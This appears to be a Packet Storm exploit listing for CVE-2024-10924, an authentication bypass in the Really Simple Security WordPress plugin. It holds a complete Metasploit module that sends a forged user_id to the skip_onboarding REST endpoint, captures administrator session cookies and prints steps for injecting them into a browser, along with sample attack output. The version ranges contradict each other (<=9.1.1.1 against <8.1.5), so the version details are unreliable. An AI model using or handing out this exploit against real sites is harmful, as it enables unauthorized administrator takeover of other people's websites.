Share
## https://sploitus.com/exploit?id=PACKETSTORM:216375
=============================================================================================================================================
    | # Title     : WordPress Really Simple Security 9.1.1.1 authentication bypass vulnerability                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/                                                                                              |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/214234/ & CVE-2024-10924
    
    [+] Summary    :  This module exploits an authentication bypass vulnerability (CVE-2024-10924) in the Really Simple SSL plugin for WordPress (versions <= 9.1.1.1). 
                      The vulnerability exists in the skip_onboarding REST API endpoint. 
    				  When exploited, the module allows unauthenticated attackers to gain full administrator access by impersonating a valid user ID.
    
    [+] Usage : 
    
    # 1. Vulnerability Check
    
    msf6 > use exploit/multi/http/wordpress_really_simple_ssl_auth_bypass
    msf6 exploit(...) > set RHOSTS target.com
    msf6 exploit(...) > set TARGETURI /wordpress
    msf6 exploit(...) > check
    [+] target.com:80 - Vulnerable version 8.1.3 detected
    
    # 2. Exploiting the Vulnerability to Obtain Cookies
    
    msf6 exploit(...) > exploit
    [*] Starting authentication bypass attempt...
    [+] Authentication bypass successful!
    
    [+] Admin access confirmed!
    
    [+] MANUAL EXPLOITATION INSTRUCTIONS
    ======================================
    [+] Authentication Bypass Successful!
    
    Cookies obtained: wordpress_logged_in_abc=...
    
    [+] Next Steps:
    
    1. Visit: http://target.com/wordpress/wp-admin
    
    2. Use cookies from above
    
    3. You should have admin access
    
    # 3. Manual Exploitation
    # Using curl or your browser with cookies
    
    [+] POC :
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = NormalRanking
    
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'WordPress Really Simple SSL Plugin Authentication Bypass',
          'Description'    => %q{
            This module exploits an authentication bypass vulnerability (CVE-2024-10924) 
            in the Really Simple SSL plugin for WordPress (versions < 8.1.5). 
            The vulnerability exists in the skip_onboarding REST API endpoint. 
            When exploited, the module allows unauthenticated attackers to gain 
            full administrator access by impersonating a valid user ID.
          },
          'Author'         => [
            'JoshuaProvoste', # Original Discovery
            'indoushka'       # Professional Refinement
          ],
          'License'         => MSF_LICENSE,
          'References'      => [
            ['CVE', '2024-10924'],
            ['URL', 'https://www.wordfence.com/blog/2024/11/critical-authentication-bypass-vulnerability-patched-in-really-simple-ssl-plugin/'],
            ['URL', 'https://really-simple-ssl.com/cve-2024-10924-authentication-bypass/']
          ],
          'DisclosureDate' => '2024-11-06',
          'Platform'       => ['php'],
          'Arch'           => ARCH_PHP,
          'Targets'        => [
            ['WordPress Really Simple SSL < 8.1.5', {}]
          ],
          'DefaultTarget'  => 0,
          'Notes'          => {
            'Stability'   => [CRASH_SAFE],
            'Reliability' => [RELIABLE_SIDE_EFFECTS],
            'SideEffects' => [IOC_IN_LOGS]
          }
        ))
    
        register_options([
          OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
          OptInt.new('USER_ID', [true, 'User ID to impersonate (Administrator is usually 1)', 1])
        ])
      end
    
      def check
        vprint_status("Checking Really Simple SSL version...")
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, 'wp-content/plugins/really-simple-ssl/readme.txt')
        })
    
        return CheckCode::Unknown('Target unreachable') unless res
    
        if res.code == 200 && res.body.include?('Really Simple SSL')
          version = res.body.scan(/Stable tag:\s*([\d.]+)/).flatten.first
          if version
            vprint_status("Found version: #{version}")
            if Rex::Version.new(version) < Rex::Version.new('8.1.5')
              return CheckCode::Appears("Vulnerable version #{version} detected")
            end
            return CheckCode::Safe("Version #{version} is not vulnerable")
          end
        end
        CheckCode::Safe
      end
    
      def exploit
        api_path = normalize_uri(target_uri.path, 'wp-json', 'reallysimplessl', 'v1', 'two_fa', 'skip_onboarding')
        
        print_status("Attempting authentication bypass on #{datastore['RHOST']}...")
    
        res = send_request_cgi({
          'method'  => 'POST',
          'uri'     => api_path,
          'headers' => { 'Content-Type' => 'application/json' },
          'data'    => {
            'user_id' => datastore['USER_ID'],
            'login_nonce' => Rex::Text.rand_text_alphanumeric(14),
            'redirect_to' => '/wp-admin/'
          }.to_json
        })
    
        unless res && res.get_cookies =~ /wordpress_(logged_in|sec)_/
          fail_with(Failure::NoAccess, "Bypass failed. No valid session cookies found in response.")
        end
    
        @cookies = res.get_cookies
        print_good("Successfully obtained authentication cookies.")
    
        print_status("Verifying administrative access...")
        if verify_admin_access
          print_good("Admin access confirmed via dashboard check!")
    
          loot_path = store_loot(
            'wp.cookies',
            'text/plain',
            datastore['RHOST'],
            @cookies,
            'wordpress_session_cookies',
            "CVE-2024-10924 Auth Bypass - User ID: #{datastore['USER_ID']}"
          )
          print_status("Session cookies stored at: #{loot_path}")
    
          report_instructions
          return
        else
          print_warning("Cookies obtained but admin verification failed. User ID might not have admin rights.")
          print_line("Cookies: #{@cookies}")
        end
      end
    
      def verify_admin_access
    
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, 'wp-admin', 'plugin-install.php'),
          'cookie' => @cookies
        })
    
        res && res.code == 200 && res.body.include?('plugin-install.php') && !res.body.include?('wp-login.php')
      end
    
      def report_instructions
        admin_url = full_uri(normalize_uri(target_uri.path, 'wp-admin/'))
        
        print_line("\n" + "="*70)
        print_line(" EXPLOITATION COMPLETED SUCCESSFULLY")
        print_line("="*70)
        print_line("Admin URL: #{admin_url}")
        print_line("Cookies:   #{@cookies}")
        print_line("\nInstructions:")
        print_line("1. Open your browser and navigate to the Admin URL.")
        print_line("2. Use a cookie editor extension to inject the cookies above.")
        print_line("3. Refresh the page to access the WordPress dashboard.")
        print_line("="*70 + "\n")
      end
    end
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================